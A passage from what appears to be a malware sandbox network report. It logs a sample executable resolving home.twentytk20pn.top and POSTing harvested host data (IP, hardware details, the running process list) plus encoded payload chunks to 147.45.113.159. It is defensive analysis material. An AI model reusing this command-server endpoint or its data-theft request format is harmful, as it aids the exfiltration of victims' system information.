                                                            Dec 20, 2024 16:37:57.230082989 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.230134010 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.271107912 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.271230936 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.346391916 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346448898 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346545935 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.346586943 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.346718073 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346833944 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346892118 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.347084999 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347146034 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347389936 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347481012 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347672939 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347714901 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347791910 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347982883 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.348023891 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.348357916 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.348936081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.348994017 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349047899 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349093914 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349097013 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349129915 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349165916 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349189043 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349268913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349315882 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349456072 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349466085 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349476099 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349515915 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349543095 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349687099 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349777937 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349834919 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349844933 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349854946 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349899054 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349917889 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349987030 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350023985 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350263119 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350343943 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350441933 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350588083 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350727081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350737095 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350820065 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351037979 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351046085 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351054907 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351216078 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351392984 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351401091 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351409912 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351484060 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351492882 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351571083 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351663113 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351710081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351717949 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351896048 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352063894 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352072954 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352103949 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352226973 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352236032 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352305889 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352401972 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352411032 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352467060 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352586985 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352595091 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.390855074 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.447432041 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.447523117 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.447602987 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.448029041 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.466567993 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466583967 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466660023 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466670036 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466815948 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466835022 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466845036 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468106985 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468246937 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468257904 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468266964 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468389988 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468399048 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468409061 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468543053 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468679905 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468689919 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468698978 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468708038 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468848944 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468858004 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468974113 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468983889 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468992949 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469005108 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469134092 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469145060 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469155073 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469166040 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469300032 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469309092 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469317913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469434023 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469451904 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469461918 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469572067 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469582081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469587088 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469723940 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469733000 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469741106 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469752073 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469891071 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469899893 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469908953 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470033884 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470043898 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470053911 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470062971 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470201969 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470211983 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470220089 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470228910 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470240116 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470249891 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470263958 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470273018 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470282078 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470300913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470309973 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.470319033 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.567173004 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.567444086 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:58.709232092 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:58.829334021 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:58.829432011 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:58.829854965 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:58.949481964 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:38:00.259150982 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:38:00.259170055 CET8049732147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:38:00.259299994 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:38:00.259756088 CET4973280192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:38:00.379561901 CET8049732147.45.113.159192.168.2.4

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 16:37:52.235081911 CET5730153192.168.2.41.1.1.1
                                                            Dec 20, 2024 16:37:52.235239029 CET5730153192.168.2.41.1.1.1
                                                            Dec 20, 2024 16:37:52.372595072 CET53573011.1.1.1192.168.2.4
                                                            Dec 20, 2024 16:37:52.528939962 CET53573011.1.1.1192.168.2.4
                                                            Dec 20, 2024 16:37:55.619620085 CET5730453192.168.2.41.1.1.1
                                                            Dec 20, 2024 16:37:55.619688988 CET5730453192.168.2.41.1.1.1
                                                            Dec 20, 2024 16:37:55.759844065 CET53573041.1.1.1192.168.2.4
                                                            Dec 20, 2024 16:37:55.904784918 CET53573041.1.1.1192.168.2.4
                                                            Dec 20, 2024 16:37:58.034225941 CET5730653192.168.2.41.1.1.1
                                                            Dec 20, 2024 16:37:58.034327030 CET5730653192.168.2.41.1.1.1
                                                            Dec 20, 2024 16:37:58.173342943 CET53573061.1.1.1192.168.2.4
                                                            Dec 20, 2024 16:37:58.708002090 CET53573061.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 20, 2024 16:37:52.235081911 CET192.168.2.41.1.1.10xe671Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:37:52.235239029 CET192.168.2.41.1.1.10xfab1Standard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 20, 2024 16:37:55.619620085 CET192.168.2.41.1.1.10xbd45Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:37:55.619688988 CET192.168.2.41.1.1.10x6e53Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                            Dec 20, 2024 16:37:58.034225941 CET192.168.2.41.1.1.10x1e11Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:37:58.034327030 CET192.168.2.41.1.1.10x50fStandard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 20, 2024 16:37:52.528939962 CET1.1.1.1192.168.2.40xe671No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:37:52.528939962 CET1.1.1.1192.168.2.40xe671No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:37:55.759844065 CET1.1.1.1192.168.2.40xbd45No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:37:58.708002090 CET1.1.1.1192.168.2.40x1e11No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.twentytk20pn.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449731147.45.113.159807600C:\Users\user\Desktop\1o81tDUu5M.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 16:37:56.033643961 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                            Host: home.twentytk20pn.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 456478
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 30 37 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709074", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                            Dec 20, 2024 16:37:56.155673981 CET2472OUTData Raw: 49 4a 4a 5c 2f 45 47 31 77 64 51 2b 49 6a 61 65 70 47 64 39 7a 38 4f 64 5a 6a 69 77 4f 70 57 56 39 63 57 4e 74 6f 49 4c 59 62 35 51 52 6e 47 56 7a 5c 2f 48 4f 49 2b 6e 37 39 45 7a 43 5c 2f 57 48 58 38 55 73 56 47 6e 68 63 52 58 77 6c 66 45 52 38
                                                            Data Ascii: IJJ\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGnhcRXwlfER8OfFWrhYYjDTdOtTWLpcDzws+Sas5U6soNNSjJxkm\/wCu6H0D\/pXYmnQq0fCqU4YmhSxNFPjbw5hUnRrwjOlP2M+L41o88ZJ8s4Rkr2lFNNH5CUV+v1v\/AMEnPEFwSP8AhdmioQcEHwRfEhh\/Cf8AipRg4wecH
                                                            Dec 20, 2024 16:37:56.155708075 CET7416OUTData Raw: 38 4f 50 38 5c 2f 6e 55 54 32 2b 66 36 4d 33 70 39 66 6c 2b 70 44 35 6d 35 74 6e 38 5a 5c 2f 77 43 65 5a 5c 2f 31 32 66 38 2b 76 76 55 4e 54 4e 76 6b 4c 78 39 70 50 72 2b 35 2b 6e 58 5c 2f 50 62 6d 6d 64 64 5c 2f 79 53 62 5c 2f 38 41 6e 6e 48 36
                                                            Data Ascii: 8OP8\/nUT2+f6M3p9fl+pD5m5tn8Z\/wCeZ\/12f8+vvUNTNvkLx9pPr+5+nX\/Pbmmdd\/ySb\/8AnnH6c\/5zxWR0U+vy\/UrHZ5juP+2ckY59\/wDP0+lNi3yeT\/An\/TPj\/Of88VK2ZN6f+Q\/8fr\/niocfwfx+V5Uv7r\/l3\/z09MV0GhD5m7\/bEkX737R\/n\/D2oWOfbvHz+Z+6lH\/Lf\/PHb+dPk2EIn8ccvP
                                                            Dec 20, 2024 16:37:56.155778885 CET14832OUTData Raw: 50 6b 2b 66 38 41 31 6e 66 36 66 35 5c 2f 70 6a 74 6d 72 6e 6b 35 5c 2f 31 68 44 66 79 5c 2f 53 71 30 6b 66 33 74 5c 2f 33 2b 50 54 5c 2f 50 31 78 51 61 6b 50 6f 69 66 38 73 5c 2f 39 56 5c 2f 6e 5c 2f 77 44 56 37 63 55 77 42 32 2b 36 6e 6d 48 36
                                                            Data Ascii: Pk+f8A1nf6f5\/pjtmrnk5\/1hDfy\/Sq0kf3t\/3+PT\/P1xQakPoif8s\/9V\/n\/wDV7cUwB2+6nmH6kfrU+1\/9zn\/V\/wDLfp7Z61B5b\/J\/Hj\/I\/T6frmg6A8tP40jT\/lr3E\/SqbL83+x\/00\/cW\/wD26duv\/wBerm3938\/5yfz\/AD\/ljqKh2x\/P\/H5f73uaDsp9fkVix27Pr\/n8OP8AJpkrfu97\/
                                                            Dec 20, 2024 16:37:56.275862932 CET2472OUTData Raw: 48 78 4d 68 31 48 52 50 68 39 50 5a 36 37 70 30 33 68 6a 34 63 65 4b 64 4c 31 36 4f 39 69 67 30 66 55 62 79 35 74 39 53 68 73 66 77 37 4d 66 42 37 36 49 47 55 34 5c 2f 4d 73 73 7a 48 69 7a 45 59 62 47 35 50 4c 47 51 7a 57 6c 4c 69 50 48 54 6a 6c
                                                            Data Ascii: HxMh1HRPh9PZ67p03hj4ceKdL16O9ig0fUby5t9Shsfw7MfB76IGU4\/MsszHizEYbG5PLGQzWlLiPHTjl88BgMHmeLji69LAzw9F0cFmGBrPnqrneLoUafPXqRpv+kso8dfp459leXZzlHBWEx2XZtQoYrLK9PhPLYzx2HxOIzDDUa2GwtXMKeLqwlPKczqScaD9lhcDicdV5MFSliF+93\/D9c\/9Gsj\/AMPh\/wDigr8uf2
                                                            Dec 20, 2024 16:37:56.275897980 CET2472OUTData Raw: 2f 72 6e 32 5c 2f 77 41 50 53 6e 79 53 66 75 39 69 4a 5c 2f 71 5c 2f 2b 57 6e 2b 66 70 5c 2f 54 6f 4f 5a 44 76 38 7a 5a 79 5c 2f 32 66 2b 5c 2f 38 41 68 2b 4e 56 64 32 33 2b 50 35 78 78 31 5c 2f 38 41 4a 72 5c 2f 50 72 2b 46 61 46 6a 79 7a 38 70
                                                            Data Ascii: /rn2\/wAPSnySfu9iJ\/q\/+Wn+fp\/ToOZDv8zZy\/2f+\/8Ah+NVd23+P5xx1\/8AJr\/Pr+FaFjyz8p\/36kk\/z\/n9ah+fy95+T8uv\/Tp\/Kn\/6wD5P3X\/LLv8A54P55qFc\/cP+kp\/11\/fw\/hz\/ACrnOvnfl\/XzGTfd+SP5\/wDVS\/8ATb\/PXp6fjCyp5jlPnj\/1Xmf8t\/8APX9Kvt\/A\/wC8fy5f3XP
                                                            Dec 20, 2024 16:37:56.275959015 CET2472OUTData Raw: 46 38 5a 50 42 76 68 6a 77 4e 34 48 30 62 34 67 66 47 7a 34 4f 2b 48 39 50 76 76 45 33 77 31 38 63 5c 2f 74 48 32 31 76 34 6b 38 56 2b 44 66 69 46 38 58 5c 2f 41 50 69 62 34 67 52 33 6d 70 36 42 70 75 70 5c 2f 54 73 6b 61 53 6f 30 63 71 4a 4a 47
                                                            Data Ascii: F8ZPBvhjwN4H0b4gfGz4O+H9PvvE3w18c\/tH21v4k8V+DfiF8X\/APib4gR3mp6Bpup\/TskaSo0cqJJG4w6SKHRh6MrAqw9iCKzH0HQ5IhBJoukyQg5EL6dZtEDknIjaEpnJJzjOST3r+fPGHwFy7xczzhbPsZnuOynF8JYXGUctp4anTqUJ18VnGQZz9ZrqVqqnTqcP0MNCeHq0KscJjMwpRqKWIjUo\/xv4DfSZzTwNyDif
                                                            Dec 20, 2024 16:37:56.275979996 CET2472OUTData Raw: 65 4c 4a 39 43 75 50 43 2b 76 54 65 48 30 38 4b 66 45 62 58 6f 4e 66 59 36 65 59 5c 2f 4b 67 75 4c 68 72 58 33 71 65 78 30 2b 35 6c 57 65 35 30 2b 7a 75 4a 6c 42 43 7a 54 32 30 45 73 71 67 6a 42 43 79 53 52 73 34 42 48 42 41 50 54 6a 70 56 4b 54
                                                            Data Ascii: eLJ9CuPC+vTeH08KfEbXoNfY6eY\/KguLhrX3qex0+5lWe50+zuJlBCzT20EsqgjBCySRs4BHBAPTjpVKTw14alLSy+HtDldzud5NJsHdm6ZZ2tyzHtk5Nfhs\/ox4HCcc43j3IeJ8yyjNa+d4jN8FSjh8HiMPltLE5Tm+X1stw1PFYXEJ4Kti+IuIM5rqopV3meb4urQr4ek6VGl\/SVL6ZGb4zw1wHhhxLwblOe5HQyHCZPj6
                                                            Dec 20, 2024 16:37:56.276248932 CET2472OUTData Raw: 64 61 39 61 61 64 64 61 6a 61 66 59 76 39 67 36 46 5c 2f 30 42 64 4a 5c 2f 77 44 42 64 5a 5c 2f 5c 2f 41 42 6d 6d 44 77 35 34 65 44 6d 51 61 44 6f 77 6b 59 59 61 51 61 58 59 68 32 48 48 42 62 79 4e 78 48 79 72 77 54 6a 67 65 67 72 38 45 78 66 30
                                                            Data Ascii: da9aaddajafYv9g6F\/0BdJ\/wDBdZ\/\/ABmmDw54eDmQaDowkYYaQaXYh2HHBbyNxHyrwTjgegr8Exf0Hcixsq\/t+N83qU8VneCzvE4ephaE8PKvg81xWazoUqN1To4fHOvQy7MYU4qeNy3L8FTrVHi4VcZV\/qzCftIOKMJh8Th6fh1w\/TeI4djw39YoYzGUMSsHSo5NTw1SpVpyTrV8JWyvE47C1Kqn7DG53nE6UY0MRQ
                                                            Dec 20, 2024 16:37:56.276263952 CET2472OUTData Raw: 4d 38 44 70 6e 69 72 46 4d 6b 55 5c 2f 66 39 66 38 41 50 34 56 50 73 76 4b 50 33 66 38 41 41 41 70 2b 58 73 48 38 2b 74 4d 5a 64 33 34 56 61 70 72 4c 75 71 76 5a 2b 66 34 66 38 45 36 43 70 73 50 74 5c 2f 6e 38 4b 68 5a 64 33 38 76 72 56 78 6c 5c
                                                            Data Ascii: M8DpnirFMkU\/f9f8AP4VPsvKP3f8AAAp+XsH8+tMZd34VaprLuqvZ+f4f8E6CpsPt\/n8KhZd38vrVxl\/g+g9PT8qi8p\/T9D\/hR7Pz\/D\/gnQVGG38s0lSsu7+X1pj\/AHj+H8hU+y8o\/wBfI09p5fj\/AMAh8v3\/AE\/+vUdWKr1p7\/8Ad\/E7Cu8b9vxH+efwxUOxvT+X+NXqiZdv5\/lR7\/8Ad\/Evnq+f3v8A+
                                                            Dec 20, 2024 16:37:56.323246956 CET27192OUTData Raw: 7a 50 2b 57 45 33 2b 54 6e 2b 58 4f 61 59 2b 5c 2f 63 2b 39 49 33 38 76 39 31 4c 4a 48 5c 2f 6e 5c 2f 41 41 37 5a 71 6a 51 47 2b 58 39 38 69 53 54 4a 35 58 37 72 2b 6f 70 6d 32 4e 76 76 5c 2f 4a 5c 2f 31 30 5c 2f 7a 37 34 34 70 35 55 78 5c 2f 4b
                                                            Data Ascii: zP+WE3+Tn+XOaY+\/c+9I38v91LJH\/n\/AA7ZqjQG+X98iSTJ5X7r+opm2Nvv\/J\/10\/z744p5Ux\/Kjx7JP9Fi8uTyP89+cdaZ5nR0f2l\/57w\/\/X7\/ANelBpT6\/L9SL\/lpC7mN0uP3UQ8r\/U+nf6Yz+hNJs+ZP40\/6eP8A0l\/+tn8cHFPWPbsff\/q\/3sX\/AE2\/z+n1ok\/v\/f8A3X+r9\/8AJoNBknV9n
                                                            Dec 20, 2024 16:37:57.447432041 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
